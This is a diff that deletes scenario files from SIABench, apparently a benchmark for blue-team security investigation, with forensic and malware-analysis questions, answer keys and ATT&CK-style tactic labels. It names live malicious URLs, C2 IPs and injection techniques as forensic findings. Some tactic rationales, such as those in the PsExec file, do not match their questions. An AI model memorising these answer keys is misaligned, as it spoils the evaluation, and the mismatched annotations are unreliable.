"adversarial_tactic": "Command and Control: Analyzing protocol usage helps reveal Command and Control tactics, as protocols like HTTP are often used for ongoing control and communication with compromised hosts." - }, - { - "question": "3. Can you find if there is any evidence of delivering any malicious executable? If so, what is the responsible URL?", - "answer": "http://sploitme.com.cn/fg/load.php", - "adversarial_tactic": "Initial Access: Recognizing the URL serving malicious executables indicates Initial Access tactics, as it shows how attackers deliver payloads to compromise systems." - }, - { - "question": "4. Review HTTP response data in the pcap file. What is the packet number where a redirect occurs to a localized version of Googles French homepage, suggesting geo-based targeting?", - "answer": "299", - "adversarial_tactic": "" - }, - { - "question": "5. Can you identify if there is any Content Management System (CMS) used to generate the page 'shop.honeynet.sg/catalog/'? If so, what is the CMS?", - "answer": "osCommerce Online Merchant", - "adversarial_tactic": "" - }, - { - "question": "6. Can you identify if there is any evidence of indication that 'show.php' will avoid infecting the same host twice? If so, which packet number indicates this?", - "answer": "366", - "adversarial_tactic": "Defense Evasion: Logic to avoid infecting the same host twice indicates Defense Evasion, as the code is designed to minimize detection by reducing suspicious activity on known hosts" - }, - { - "question": "7. Can you identify any obfuscated script at 'shop.honeynet.sg/catalog'? If so, can you deobfuscate to find the value of the 'click' parameter?", - "answer": "84c090bd86", - "adversarial_tactic": "Defense Evasion: Deobfuscation analysis supports Defense Evasion by exposing how the script avoids detection (e.g., hiding its purpose or functionality within encoded content)." - }, - { - "question": "8.Can you identify any obfuscated script at 'rapidshare.com.eyu32.ru/login.php'? If you can find any, can you deobfuscate to find the value of the 'click' parameter?", - "answer": "3feb5a6b2f", - "adversarial_tactic": "Defense Evasion: Similar to question 9, this deobfuscation of JavaScript aligns with Defense Evasion as it reveals obfuscation strategies to hide malicious actions within scripts." - }, - { - "question": "9. Can you find any evidence of any executable file that seems to be suspicious? If so, can you examine the metadata in the executable to determine the version of 'mingw-gcc' used to compile the malware?", - "answer": "3.4.5", - "adversarial_tactic": "Execution: Identifying the compiler version (e.g., mingw-gcc 3.4.5) is relevant to Execution, as it helps understand the malwares origin and potential development environment." - }, - { - "question": "10. Is there any evidence of a shellcode in the pcap file inside 'urlmon.dll'? If so, can you find any function that seems to be used to download files from the internet to the compromised host? If you can find any, what is the name of the function?", - "answer": "URLDownloadToFile", - "adversarial_tactic": "Execution: Recognizing API functions like URLDownloadToFile connects to Execution, as it shows how the shellcode initiates file download operations on the victim's machine." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/obfuscated.json b/SIABench-main/SIA_Dataset/obfuscated.json deleted file mode 100644 index 2975b072d12b1fd1cf28fb31ca99b127df1b603d..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/obfuscated.json +++ /dev/null @@ -1,68 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/obfuscated/", - "scenario_name": "Obfuscated", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/Obfuscated" - } - }, - { - "sia_components": { - "scenario": "As a SOC analyst, you might come across alerts from the organization's Endpoint Detection and Response (EDR) system flagging suspicious behavior on a user’s device. In one case, a user reported receiving a DOC file via email from an unfamiliar sender. To verify its safety, the user submitted the document for further analysis.", - "task_category": "Malware Analysis", - "complexity": "Medium", - "tools_available": [ - "oledump", - "olevba", - "grep", - "find", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python3" - ], - "files_available": "sample", - "instructions": "\nYou are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, oledump or olevba if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. what is the SHA256 hash value of the DOC file?", - "answer": "ff2c8cadaa0fd8da6138cce6fce37e001f53a5d9ceccd67945b15ae273f4d751", - "adversarial_tactic": "" - }, - { - "question": "2. Do you think the document contains any macros? If so, provide the number of the lowest one", - "answer": "8", - "adversarial_tactic": "Execution: Identifying macros in documents is crucial for understanding how the document executes code, which can lead to malicious actions. This is a common tactic used by malware to execute payloads without user consent." - }, - { - "question": "3. Can you find any obfuscated code in the document? if so, Can you identify if there is any key used to decrypt the obfuscated code? If so, what is the key?", - "answer": "EzZETcSXyKAdF_e5I2i1", - "adversarial_tactic": "Defense Evasion: Obfuscation is a common technique used by malware to evade detection by security tools. Identifying obfuscated code and its decryption key is crucial for understanding the malware's behavior and potential impact on the system." - }, - { - "question": "4. Can you identify if there are any files dropped by the malware? If so, what is the name of the file?", - "answer": "maintools.js", - "adversarial_tactic": "Execution: Identifying dropped files is essential for understanding the malware's impact on the system and its potential to execute further malicious actions. This helps in assessing the scope of the attack and planning remediation steps." - }, - { - "question": "5. Can you find any obfuscated scripts in the document? If so, what is the name of the scripting language used in the obfuscated code?", - "answer": "JavaScript", - "adversarial_tactic": "Execution: Identifying the scripting language used helps determine the execution context, required interpreters, and potential system implications, which is crucial for both detection and remediation." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/packetmaze.json b/SIABench-main/SIA_Dataset/packetmaze.json deleted file mode 100644 index 17a984b1499f8fd8c57a1bee99f56bf4b8d8348e..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/packetmaze.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/packetmaze/", - "scenario_name": "PacketMaze", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/PacketMaze" - } - }, - { - "sia_components": { - "scenario": "A company's internal server has been flagged for unusual network activity, with multiple outbound connections to an unknown external IP. Initial analysis suggests possible data exfiltration. Investigate the provided network logs to determine the source and method of compromise.", - "task_category": "Network Forensics", - "complexity": "Medium", - "tools_available": [ - "tshark", - "python", - "md5sum", - "grep", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "xxd", - "base64", - "cd", - "whois" - ], - "files_available": "capture.pcapng", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.\n", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify if there is any password was used to successfully authenticate to the FTP server?, if so, what is the password?", - "answer": "AfricaCTF2021", - "adversarial_tactic": "Initial Access: Identifying credentials used for authentication is crucial for understanding how attackers gain access to systems. This can help in preventing unauthorized access in the future." - }, - { - "question": "2. Can you identify the IPv6 address of the DNS server that was queried by the host with IP address 192.168.1.26? If so, what is the IPv6 address?", - "answer": "fe80::c80b:adff:feaa:1db7", - "adversarial_tactic": "" - }, - { - "question": "3. In the pcap file, analyze packet number 15174. What specific domain name was being looked up in this DNS query?", - "answer": "www.7-zip.org", - "adversarial_tactic": "" - }, - { - "question": "4. Based on the pcap analysis, can you identify if there are UDP packets were sent from the internal host 192.168.1.26 to the external IP address 24.39.217.246? If so, how many were sent?", - "answer": "10", - "adversarial_tactic": "Exfiltration: Counting packets sent to external addresses helps quantify potential data exfiltration activity and understand the volume of suspicious communications." - }, - { - "question": "5. Can you identify the MAC address of the potentially compromised internal system that's showing signs of data exfiltration? If so, what is the MAC address?", - "answer": "c8:09:a8:57:47:93", - "adversarial_tactic": "" - }, - { - "question": "6. During TLS handshake analysis in the pcap file, examine the session with ID 'da4a0000342e4b73459d7360b4bea971cc303ac18d29b99067e46d16cc07f4ff'. What is the server certificate public key provided by the server in this handshake?", - "answer": "04edcc123af7b13e90ce101a31c2f996f471a7c8f48a1b81d765085f548059a550f3f4f62ca1f0e8f74d727053074a37bceb2cbdc7ce2a8994dcd76dd6834eefc5438c3b6da929321f3a1366bd14c877cc83e5d0731b7f80a6b80916efd4a23a4d", - "adversarial_tactic": "Command and Control: Understanding encryption details in TLS handshakes can help identify potentially malicious encrypted communications channels established by attackers." - }, - { - "question": "7. Can you identify any TLS 1.3 client random that was used to establish a connection with protonmail.com? if so, what is the value of the first TLS 1.3 client random?", - "answer": "24e92513b97a0348f733d16996929a79be21b0b1400cd7e2862a732ce7775b70", - "adversarial_tactic": "Command and Control: TLS client random values are useful for identifying specific encrypted sessions that might be part of an attacker's command and control infrastructure." - }, - { - "question": "8. Can you identify the country of the MAC address of the FTP server registered in? If so, what is the country?", - "answer": "United States", - "adversarial_tactic": "" - }, - { - "question": "9. Can you identify if there was any non-standard folder created on the FTP server on 20th April? If so, at what time the folder was created?", - "answer": "17:53", - "adversarial_tactic": "Collection: Identifying non-standard folders can indicate attempts to collect or store sensitive data in unusual locations, which may be part of a larger data exfiltration strategy." - }, - { - "question": "10. In the pcap file, what domain was the user connected to in packet 27300?", - "answer": "dfir.science", - "adversarial_tactic": "Discovery: Identifying web resources accessed by internal users can reveal reconnaissance activities or attempts to download additional tools or malware." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/phishing_email.json b/SIABench-main/SIA_Dataset/phishing_email.json deleted file mode 100644 index ab16542b0e28cf47aa6feba03df430d05aab5110..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/phishing_email.json +++ /dev/null @@ -1,90 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/phishing-analysis-2-a1091574b8", - "scenario_name": "Btlo_Phishing_Email", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@josephkarug/phishing-analysis-2-blue-team-lab-walkthrough-1ceca3f590d7" - } - }, - { - "sia_components": { - "scenario": "This task aims to test your phishing investigation abilities by triaging artifacts and collecting key details about a recent phishing campaign. As a blue team analyst, your role is to analyze the provided evidence and answer the associated questions.", - "task_category": "Miscellaneous", - "complexity": "Easy", - "tools_available": [ - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "exiftool", - "python", - "whois", - "curl" - ], - "files_available": "email.eml", - "instructions": "You are solving this problem in a kali linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. What is the sender's email address?", - "answer": "amazon@zyevantoby.cn", - "adversarial_tactic": "" - }, - { - "question": "2. Who was the intended recipient of the email?", - "answer": "saintington73@outlook.com", - "adversarial_tactic": "" - }, - { - "question": "3. What is the subject line mentioned in the email?", - "answer": "'Your Account has been locked'", - "adversarial_tactic": "" - }, - { - "question": "4. Can you identify if any company being impersonated in the email? If so, provide the name of the company.", - "answer": "Amazon", - "adversarial_tactic": "Initial Access: By imitating a legitimate company, the attacker attempts to gain the recipient's trust and initial access." - }, - { - "question": "5. What is the date and time the email was sent?", - "answer": "Wed, 14 Jul 2021 01:40:32 +0900", - "adversarial_tactic": "" - }, - { - "question": "6. Upon examining the email content in a text editor, can you identify if any encoding scheme has been used. If so, what is the encoding scheme?", - "answer": "'base64'", - "adversarial_tactic": "Defense Evasion: Encoding schemes such as Base64 can conceal content and avoid detection, aligning with Defense Evasion tactics to bypass standard text inspection." - }, - { - "question": "7. Can you identify if there is any URL embedded within the email body to retrieve external content, such as images or logos? If so, what is the URL?", - "answer": "'https://images.squarespace-cdn.com/content/52e2b6d3e4b06446e8bf13ed/1500584238342-OX2L298XVSKF8AO6I3SV/amazon-logo?format=750w&content-type=image%2Fpng'", - "adversarial_tactic": "Command and Control: Embedded URLs can be used to track user interactions or download malicious content, aligning with Command and Control tactics." - }, - { - "question": "8. Can you identify any URLs related to social media profiles within the email content? If so, extract and analyze the associated username.", - "answer": "'amir.boyka.7'", - "adversarial_tactic": "" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/ps_exec.json b/SIABench-main/SIA_Dataset/ps_exec.json deleted file mode 100644 index 30c761d136bfe33a8dc8a8c1f046b6fbc3771d91..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/ps_exec.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/psexec-hunt/", - "scenario_name": "Ps_Exec", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/Panagiotis-INS/Cyber-Defenders/tree/main/PsExec%20Hunt" - } - }, - { - "sia_components": { - "scenario": "An alert from the Intrusion Detection System (IDS) reported unusual lateral movement activity involving PsExec, suggesting possible unauthorized access and movement within the network. As a SOC Analyst, your role is to analyze the supplied PCAP file to track the attacker’s actions. Determine how they initially accessed the network, which systems were targeted, the scope of the intrusion, and key indicators that reveal their methods and intentions within the compromised environment.", - "task_category": "Network Forensics", - "complexity": "Medium", - "tools_available": [ - "tshark", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "uniq", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python", - "whois", - "curl" - ], - "files_available": "capture.pcap", - "instructions": "You are solving this problem in a Kali Linux terminal. With the mentioned tools, you can use any other tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command.", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify any suspicious IP address that is responsible for the initial access? if so, what is the IP address?", - "answer": "10.0.0.130", - "adversarial_tactic": "Initial Access: Identifying the source IP reveals how the attacker first made contact with the victim system." - }, - { - "question": "2. Can you identify the machine's hostname to which the suspicious activity happened? If so, what is the hostname?", - "answer": "SALES-PC", - "adversarial_tactic": "Initial Access: Recognizing the initial malicious file helps trace how the attacker delivered the payload." - }, - { - "question": "3. Do you think there was any authentication step used by any suspicious user? If so, what was the username utilized?", - "answer": "ssales", - "adversarial_tactic": "Credential Access: Identifying the username used during the attack helps understand how the attacker authenticated to the system." - }, - { - "question": "4. Can you identify any service executable that has been set up on the target by any suspicious user? If so, what is it?", - "answer": "PSEXESVC", - "adversarial_tactic": "Execution: Understanding how the file behaves post-delivery informs the detection of execution paths." - }, - { - "question": "5. Can you identify any network share that might be used by PsExec to install any service on the target machine? If so, what is it?", - "answer": "ADMIN$", - "adversarial_tactic": "Persistence: Dropped files often help attackers maintain access or escalate privileges." - }, - { - "question": "6. Can you identify any network share that was used by PsExec for communication purposes? If so, what is it?", - "answer": "IPC$", - "adversarial_tactic": "Persistence: The MD5 hash provides a unique identifier that helps track this malware variant across systems." - }, - { - "question": "7. Can you identify if there was any second machine targeted? If so, what is the hostname of that machine?", - "answer": "MARKETING-PC", - "adversarial_tactic": "Persistence: The MD5 hash provides a unique identifier that helps track this malware variant across systems." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/ramnit.json b/SIABench-main/SIA_Dataset/ramnit.json deleted file mode 100644 index 2b15d4604c0e220d84092737608749c9c8d1a86b..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/ramnit.json +++ /dev/null @@ -1,81 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/ramnit/", - "scenario_name": "Ramnit", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@chaoskist/cyberdefenders-write-up-ramnit-76f916240892" - } - }, - { - "sia_components": { - "scenario": "Suspicious activity was flagged by our intrusion detection system on a workstation, suggesting a potential malware infection. A memory dump from the affected machine has been captured for further investigation. Your objective is to examine the dump, track the malware's behavior, and document the critical findings.", - "task_category": "Memory Forensics", - "complexity": "Easy", - "files_available": "memory.dmp", - "tools_available": [ - "Volatility 3.0", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "find", - "cd", - "md5sum", - "exiftool", - "python", - "whois", - "curl" - ], - "instructions": "\nYou are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install the tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify any running process that might exhibit suspicious behavior? If so, provide the name of such a process.", - "answer": "'ChromeSetup.exe'.", - "adversarial_tactic": "Execution: Identifying suspicious processes aligns with Execution since it reveals processes that may be actively executing malicious actions within the system." - }, - { - "question": "2. If there is any suspicious process identified, can you determine the exact file path of the executable associated with it? If so, what is the file path?", - "answer": "'C:\\Users\\alex\\Downloads\\ChromeSetup.exe'.", - "adversarial_tactic": "" - }, - { - "question": "3. If there is any suspicious process identified, can you identify if the suspicious process attempted any network connections? If so, what IP address did it try to connect to? ", - "answer": "58.64.204.181.", - "adversarial_tactic": "Command and Control (C2): Network connections from a suspicious process are indicative of Command and Control (C2), as malware often reaches out to an external server to receive commands or exfiltrate data." - }, - { - "question": "4. To determine the geographical location associated with the IP address the suspicious process tried to connect to, which city is linked to the IP address? ", - "answer": "Hong Kong.", - "adversarial_tactic": "Command and Control: Geolocating IP addresses helps identify the physical location of potential attackers." - }, - { - "question": "5. Can you find any evidence of suspicious executable in the memory dump? If so, what is the SHA1 hash of the suspicious executable? ", - "answer": "280c9d36039f9432433893dee6126d72b9112ad2.", - "adversarial_tactic": "Execution: Identifying suspicious processes aligns with Execution since it reveals processes that may be actively executing malicious actions within the system." - }, - { - "question": "6. If you can find any evidence of suspicious executable, can you determine the compilation timestamp of the suspicious executable identified? If so, what is the compilation timestamp?", - "answer": "2019-12-01 08:36:04.", - "adversarial_tactic": "Execution: Identifying the compilation timestamp of a suspicious executable can provide insights into the malware's development timeline." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/ransomed.json b/SIABench-main/SIA_Dataset/ransomed.json deleted file mode 100644 index 9f17523c48025b6ce0049417b35952c823da354c..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/ransomed.json +++ /dev/null @@ -1,113 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://blueteamlabs.online/home/challenge/malware-analysis-abc123", - "scenario_name": "Ransomed", - "last_accessed": "June 04, 2025", - "writeup": "https://0xapi.blogspot.com/2022/01/ransomed-ctf-solution.html" - } - }, - { - "sia_components": { - "scenario": "A company's cybersecurity team was alerted to unusual memory behavior on a workstation. The security system detected an unidentified executable with high entropy, hinting at obfuscation or packing. Deeper analysis showed that the malware allocated memory at runtime, injected shellcode, and triggered it using indirect jumps—indicating an unpacking mechanism. Your assignment is to study the malware sample through both static and dynamic analysis. Inspect the PE file structure, entropy metrics, and memory usage to understand how it unpacks, locates API functions, and delivers its payload.", - "task_category": "Malware Analysis", - "complexity": "Hard", - "tools_available": [ - "strings", - "grep", - "ent", - "md5sum", - "objdump", - "r2", - "awk", - "sed", - "find", - "file", - "cut", - "uniq", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "python" - ], - "files_available": "challenge.exe", - "instructions": "\nYou are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, objdump, r2 if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. What is the MD5 hash of the file challenge.exe?", - "answer": "a2f33095ef25b4d5b061eb53a7fe6548", - "adversarial_tactic": "" - }, - { - "question": "2. What is the entropy of the executable challenge.exe?", - "answer": "7.677", - "adversarial_tactic": "" - }, - { - "question": "3. How many sections are present in the executable challenge.exe?", - "answer": "4", - "adversarial_tactic": "" - }, - { - "question": "4. What is the entropy of the .text section in the executable challenge.exe?", - "answer": "7.844", - "adversarial_tactic": "" - }, - { - "question": "5. is there any technique used to obfuscate strings in the executable challenge.exe? If so, what is the name of the technique?", - "answer": "stack strings", - "adversarial_tactic": "Defense Evasion: String obfuscation is often used to hide malicious functionality or indicators." - }, - { - "question": "6. Is there any API that used malware allocated memory to write shellcode? If so, what is the API?", - "answer": "VirtualAlloc", - "adversarial_tactic": "Execution: Understanding memory allocation functions helps trace shellcode execution paths." - }, - { - "question": "7. Is there any memory protection technique used for allocated memory? If so, what is the protection?", - "answer": "ERW", - "adversarial_tactic": "Defense Evasion: RWX permissions are often used by malware to execute dynamically written shellcode." - }, - { - "question": "8. Can you find if there is any assembly instruction used to transfer the execution flow to the shellcode? If so, what is the instruction?", - "answer": "jmp dword ptr ss:[ebp-4]", - "adversarial_tactic": "Execution: Analyzing control flow instructions helps understand how malware executes payloads." - }, - { - "question": "9. How many functions does the malware resolve from kernel32 in the executable challenge.exe?", - "answer": "16", - "adversarial_tactic": "Execution: Identifying resolved functions reveals the APIs leveraged for malicious operations." - }, - { - "question": "10. Can you find if the malware obfuscate any strings after calling RegisterClassExA? if so, what is the first string?", - "answer": "saodkfnosa9uin", - "adversarial_tactic": "Defense Evasion: Revealing de-obfuscated strings aids in understanding the malwares runtime behavior." - }, - { - "question": "11. What is the value of dwCreationFlags used by the malware in challenge.exe when calling CreateProcessA?", - "answer": "0x08000004", - "adversarial_tactic": "Execution: Understanding process creation flags helps identify stealth techniques used by malware." - }, - { - "question": "12. Is there any process injection technique used by the malware in challenge.exe? If so, what is the technique?", - "answer": "process hollowing", - "adversarial_tactic": "Defense Evasion: Process injection techniques help malware evade detection by running malicious code within legitimate processes." - }, - { - "question": "13. Is there any API used to write the payload into the target process? If so, what is the API?", - "answer": "WriteProcessMemory", - "adversarial_tactic": "Execution: API analysis reveals methods used to inject and execute malicious code." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/redline.json b/SIABench-main/SIA_Dataset/redline.json deleted file mode 100644 index 12a8a0a37891153806980a4fb2fbe560fd345c28..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/redline.json +++ /dev/null @@ -1,85 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefhttps://cyberdefenders.org/blueteam-ctf-challenges/redline/", - "scenario_name": "Redline", - "last_accessed": "June 04, 2025", - "writeup": "https://github.com/ChickenLoner/Write_It_UP/blob/main/CyberDefenders/CyberDefenders%20-%20CyberRange/%5BCyberDefenders%20Write-up%5D%20RedLine.md" - } - }, - { - "sia_components": { - "scenario": "As part of the Security Blue team, you are tasked with examining a memory dump. Your objective is to track the attacker’s activity on the compromised host and uncover how they evaded detection by the Network Intrusion Detection System (NIDS). Your task is to analyze this dump, trace the malwares actions, and report key findings", - "task_category": "Memory Forensics", - "complexity": "Easy", - "files_available": "capture.mem", - "tools_available": [ - "Volatility 3.0", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "cd", - "md5sum", - "exiftool", - "python", - "whois", - "curl" - ], - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want. If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify if there is any suspicious process running on the system? If so, what is the name of the process?", - "answer": "oneetx.exe", - "adversarial_tactic": "Execution: Identifying suspicious processes aligns with Execution since it reveals processes that may be actively executing malicious actions within the system." - }, - { - "question": "2. If you can find suspicious process, can you find if there is any child process spawned by the suspicious process?If so, what is the name of the child process?", - "answer": "rundll32.exe", - "adversarial_tactic": "Execution: Child processes often carry out specific attacker tasks." - }, - { - "question": "3. Can you find if there is any memory protection settings for the suspicious process. If so, what memory protection is applied to the suspicious process's memory region?", - "answer": "PAGE_EXECUTE_READWRITE", - "adversarial_tactic": "Defense Evasion: Specific memory protections can indicate attempts to evade detection." - }, - { - "question": "4. Can you identify any process responsible for establishing any VPN connection. If so, What is the name of the process?", - "answer": "Outline.exe", - "adversarial_tactic": "Command and Control: VPNs can be used to maintain communication with attacker-controlled servers." - }, - { - "question": "5. Based on the memory dump, can you identify the attacker's IP address. If you can, what is the IP address?", - "answer": "77.91.124.20", - "adversarial_tactic": "Command and Control: Understanding attacker IPs helps trace external connections." - }, - { - "question": "6. Can you identify if there is any evidence that the attacker visited a URL pointing to a file? If so, what is the full URL of the file that was accessed?", - "answer": "http://77.91.124.20/store/games/index.php", - "adversarial_tactic": "Command and Control: Identifying URLs can help revealing attackers C2 infrastructure." - }, - { - "question": "7. Is there any evidence of a malicious executable on the system? If so, what is the full path of the malicious executable?", - "answer": "C:\\Users\\Tammam\\AppData\\Local\\Temp\\c3912af058\\oneetx.exe", - "adversarial_tactic": "" - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/reveal.json b/SIABench-main/SIA_Dataset/reveal.json deleted file mode 100644 index ad76018fe56ff1be0696303b86f868c6b3399eff..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/reveal.json +++ /dev/null @@ -1,75 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/reveal/", - "scenario_name": "Reveal", - "last_accessed": "June 04, 2025", - "writeup": "https://medium.com/@AbdelAlimKhaled/reveal-blue-team-lab-ddf9ce8e73bb" - } - }, - { - "sia_components": { - "scenario": "As a forensic investigator at a financial institution, you’ve been alerted to suspicious activity on a workstation that has access to sensitive financial information. Believing a breach may have occurred, you’ve been provided with a memory dump from the affected system. Your job is to examine the memory for evidence of compromise, identify the source of the anomaly, and evaluate the extent of the issue in order to contain the incident effectively.", - "task_category": "Memory Forensics", - "complexity": "Medium", - "files_available": "capture.dmp", - "tools_available": [ - "Volatility 3.0", - "grep", - "awk", - "sed", - "find", - "strings", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "echo", - "head", - "tail", - "tr", - "base64", - "cd", - "md5sum", - "exiftool", - "python", - "whois", - "curl" - ], - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. Can you identify if there is any process running on the system that exhibits suspicious behavior. If so, what is the name of the process?", - "answer": "powershell.exe", - "adversarial_tactic": "Execution: Malicious processes often execute unauthorized commands or tools." - }, - { - "question": "2. If you can find the suspicious process, can you identify the parent process ID (PPID) of the identified suspicious process from the memory dump. If so, What is the PPID?", - "answer": "4120", - "adversarial_tactic": "Execution: Understanding process hierarchies reveals how attackers initiated malicious activities." - }, - { - "question": "3. Can you find if there is evidence of malware presence in the memory dump? If so, what is the name of the file used by the malware to execute the second-stage payload?", - "answer": "3435.dll", - "adversarial_tactic": "Execution: Malicious files are often used to deliver second-stage payloads." - }, - { - "question": "4. Can you Identify if there is any shared directories accessed on a remote server by the suspicious process. If so, what is the name of the shared directory?", - "answer": "davwwwroot", - "adversarial_tactic": "Lateral Movement: Accessing shared directories on remote systems indicates potential lateral movement." - }, - { - "question": "5. Can you identify any username under which the suspicious process is running. If so, what is the username?", - "answer": "Elon", - "adversarial_tactic": "Privilege Escalation: Understanding compromised accounts helps assess attacker privileges." - } - ] - } - } - ] -} \ No newline at end of file diff --git a/SIABench-main/SIA_Dataset/team_spy.json b/SIABench-main/SIA_Dataset/team_spy.json deleted file mode 100644 index 29edde3c69b153c6130217f02e0e0fbcc896498c..0000000000000000000000000000000000000000 --- a/SIABench-main/SIA_Dataset/team_spy.json +++ /dev/null @@ -1,123 +0,0 @@ -{ - "scenarios": [ - { - "metadata": { - "source": "https://cyberdefenders.org/blueteam-ctf-challenges/teamspy/", - "scenario_name": "Team_Spy", - "last_accessed": "June 04, 2025", - "writeup": "https://forensicskween.com/ctf/cyberdefenders/teamspy/" - } - }, - { - "sia_components": { - "scenario": "An employee noticed strange behavior on their workstation after interacting with a suspicious email that included a document attachment. The incident response team acquired memory dumps from the potentially compromised machines for deeper investigation. As a SOC analyst, your task is to analyze the dumps and support the IR team in determining what occurred.", - "task_category": "Memory Forensics", - "complexity": "Hard", - "files_available": [ - "ecorpoffice/win7ecorpoffice.vmem", - "ecorpwin7/win7.vmem" - ], - "tools_available": [ - "Volatility3", - "Volatility2", - "grep", - "find", - "file", - "cut", - "unique", - "wc", - "cat", - "ls", - "sort", - "tr", - "base64", - "find", - "cd", - "md5sum", - "python3", - "strings", - "olevba" - ], - "instructions": "You are solving this problem in a kali linux terminal. You can use any tool as you want.If you need to install any other tool, you can do it by adding sudo at the beginning of the command. (Add instructions related to usage of python scripts, volatility if needed). (Extra info: The profile for win7ecorpoffice memory dump is 'Win7SP1x64'.)", - "directory": "(directory_of_the_files)", - "questions": [ - { - "question": "1. In the memory dump 'ecorpoffice/win7ecorpoffice.vmem', Can you identify if there is any process ID (PID) associated with a file that exhibits suspicious behavior? If so, what is the PID?", - "answer": "1364", - "adversarial_tactic": "Execution: Identifying the suspicious PID points to active execution, where a potentially malicious process is already running." - }, - { - "question": "2. In the 'ecorpoffice/win7ecorpoffice.vmem' memory dump, can you find any indicators of any command-and-control (C2) server communication? If so, what is the IP address of this C2 server?", - "answer": "54.174.131.235", - "adversarial_tactic": "Command and Control: Detecting external IPs used by malware is crucial for uncovering Command and Control (C2) channels used to manage the malware." - }, - { - "question": "3. Within the 'ecorpoffice/win7ecorpoffice.vmem' file, can you identify any team viewer abused by the suspicious file? If so, what is the version of TeamViewer used?", - "answer": "Team Viewer 0.2.2.2", - "adversarial_tactic": "Initial Access: Identifying the TeamViewer version exploited by attackers relates to Initial Access, where attackers leverage remote access tools to gain entry." - }, - { - "question": "4. Within the 'ecorpoffice/win7ecorpoffice.vmem' memory dump, can you find any stored passwords used by the suspicious file related to remote access? If so, what is the password associated with remote access activities?", - "answer": 